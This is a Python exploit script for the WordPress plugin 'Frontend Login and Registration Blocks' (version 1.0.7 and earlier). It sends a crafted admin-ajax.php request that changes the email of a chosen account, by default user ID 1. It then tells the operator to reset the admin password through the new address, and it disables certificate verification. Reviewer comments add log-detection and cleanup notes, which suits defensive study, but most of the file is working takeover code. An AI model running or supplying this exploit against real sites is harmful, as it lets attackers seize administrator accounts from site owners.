import requests
import argparse
import sys
#By: Khaled Alenazi (Nxploited)
# Banner
def print_banner():
    """Write the tool's ASCII-art banner and author credit to stdout."""
    # The art lines stay at column 0 because they are part of the string
    # literal; indenting them would change the printed output.
    print("""
@@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@ @@@@@@@@ @@@@@@ @@@@@@@ @@@@@@ @@@@@@ @@@@@@@@ @@@@@@@
@@@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@@@ @@@@@@@@@@ @@@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@@@@ @@@@@@@
!@@ @@! @@@ @@! @@@ @@! @@@@ @@@ !@@ @@@ !@@ @@! @@@@ !@@
!@! !@! @!@ !@! @!@ !@! @!@!@ @!@ !@! @!@ !@! !@! @!@!@ !@!
!@! @!@ !@! @!!!:! @!@!@!@!@ !!@ @!@ @! !@! !!@ !!@@!! @!@!@!@!@ @!@!!@ !!@@!@! @!@ @! !@! !!@@!!
!!! !@! !!! !!!!!: !!!@!@!!! !!: !@!!! !!! !!: @!!@!!! !!!@!@!!! !!@!@! @!!@!!!! !@!!! !!! @!!@!!!
:!! :!: !!: !!: !:! !!:! !!! !:! !:! !!: !:! !:! !!:! !!! !:!
:!: ::!!:! :!: :!: :!: !:! :!: !:! :!: :!: !:! :!: !:! !:!
::: ::: :::: :: :::: :: ::::: ::::::: :: :: ::::: :::: :: :: :::: :::: ::: ::::::: :: :::: ::
:: :: : : : :: :: :: : ::: : : : : :: : ::: :: : : : : : :: : : : : : : :: : :
By: Khaled Alenazi (Nxploited)
""")
def disable_ssl():
    """Silence urllib3's warnings for the rest of the process.

    Despite its name, this function does not change any TLS setting; it only
    suppresses the warnings urllib3 would otherwise print, which includes the
    warning raised for requests made with certificate verification off.
    """
    urllib3_bundle = requests.packages.urllib3
    urllib3_bundle.disable_warnings()
def create_session():
    """Return a requests.Session configured for this script's requests.

    Returns:
        A session with certificate verification disabled and the User-Agent
        header set to the value from get_user_agent().
    """
    http = requests.Session()
    # NOTE(review): verify=False means the server certificate is never
    # checked, so every request on this session is open to interception.
    # Presumably chosen for lab hosts with self-signed certificates.
    http.verify = False
    http.headers['User-Agent'] = get_user_agent()
    return http
def get_user_agent():
    """Return the fixed User-Agent string sent with every request.

    The value is a desktop Chrome identifier followed by the literal text
    " # By: Khaled Alenazi (Nxploited)". That suffix is part of the string,
    not a Python comment, so it appears verbatim in the target's access logs
    and is a usable log-search marker for traffic from an unmodified copy.
    """
    user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 # By: Khaled Alenazi (Nxploited)"
    return user_agent
def parse_arguments():
    """Parse the command line and return the resulting namespace.

    Options:
        --url / -u: base URL of the WordPress site (required).
        --user_id / -id: account id placed in the request (default "1").
        --mail / -mail: e-mail address placed in the request.

    Returns:
        argparse.Namespace with ``url``, ``user_id`` and ``mail`` attributes.
    """
    cli = argparse.ArgumentParser(
        description="Frontend Login and Registration Blocks Plugin <= 1.0.7 is vulnerable to Privilege Escalation"
    )
    # NOTE(review): "[email protected]" looks like an address-obfuscation
    # placeholder left by the hosting page rather than a real default.
    # Confirm against the upstream file.
    option_specs = (
        (("--url", "-u"), {"required": True, "help": "Target URL, e.g., http://192.168.100.74:888/wordpress"}),
        (("--user_id", "-id"), {"default": "1", "help": "User ID to target (default: 1)"}),
        (("--mail", "-mail"), {"default": "[email protected]", "help": "Email to set (default: [email protected])"}),
    )
    for flags, settings in option_specs:
        cli.add_argument(*flags, **settings)
    return cli.parse_args()
def build_payload(user_id, email):
    """Build the form fields for the plugin's settings-update AJAX action.

    Args:
        user_id: account id sent in the ``user_id`` field.
        email: address sent in the ``flr-blocks-email-update`` field.

    Returns:
        dict with the ``action`` name plus the two caller-supplied fields.

    Defensive note: the account to modify is named by the client in
    ``user_id``. In web or WAF logs, the pattern to look for is a POST to
    admin-ajax.php with ``action=flrblocksusersettingsupdatehandle`` and a
    ``user_id`` that is not the requester's own account. A handler that
    took the account from the authenticated session instead would not be
    steerable this way.
    """
    form_fields = {}
    form_fields['action'] = 'flrblocksusersettingsupdatehandle'
    form_fields['user_id'] = user_id
    form_fields['flr-blocks-email-update'] = email
    return form_fields
def send_exploit(session, url, payload):
    """POST the form fields to the site's admin-ajax.php endpoint.

    Args:
        session: object with a requests-style ``post(url, data=...)`` method.
        url: site base URL; "/wp-admin/admin-ajax.php" is appended as-is.
        payload: form fields sent as the request body.

    Returns:
        Whatever ``session.post`` returns.

    Any exception raised while building or sending the request is printed
    and the process exits with status 1.
    """
    try:
        reply = session.post(url + "/wp-admin/admin-ajax.php", data=payload)
    except Exception as err:
        print(f"Error sending request: {err}")
        sys.exit(1)
    else:
        return reply
def handle_response(response):
    """Print a verdict based on the HTTP status and body of the reply.

    Args:
        response: object exposing ``status_code`` and ``text``.

    A non-200 status is reported as a failure together with the body. A 200
    reply whose stripped body is exactly "0" is reported as a failure. Any
    other 200 body is reported as a success. That last case is a heuristic:
    the script never confirms that the account's e-mail actually changed.

    Defensive note: the printed next step is a password reset through the
    changed address. On a site that ran an affected plugin version, check
    privileged accounts for unexpected e-mail changes and password-reset
    activity.
    """
    # NOTE(review): indentation was lost in the copy under review. The
    # "Response:" line is assumed to belong to the non-200 branch only.
    if response.status_code != 200:
        print(f"Exploit failed. HTTP Status: {response.status_code}")
        print(f"Response: {response.text}")
        return

    body_is_zero = response.text.strip() == "0"
    if body_is_zero:
        print("Exploit failed. Server responded with '0' — likely rejected request or missing parameters.")
        return

    print(f"Exploit successful! Response: {response.text}")
    print("Final Step: Go to the Forgot Password page and reset the admin password using the new email!")
def main():
    """Run the command-line flow from banner to printed verdict.

    Steps, in order: print the banner, silence urllib3 warnings, parse the
    command line, create the HTTP session, build the form fields from the
    ``user_id`` and ``mail`` options, send them to the ``url`` option's
    admin-ajax.php endpoint, and print the verdict for the reply.
    """
    print_banner()
    disable_ssl()
    # Parsing comes after the banner, so the banner is printed even when
    # argparse rejects the command line and exits.
    options = parse_arguments()
    http = create_session()
    form_fields = build_payload(options.user_id, options.mail)
    reply = send_exploit(http, options.url, form_fields)
    handle_response(reply)
# Run the command-line flow only when executed as a script, not on import.
if __name__ == "__main__":
    main()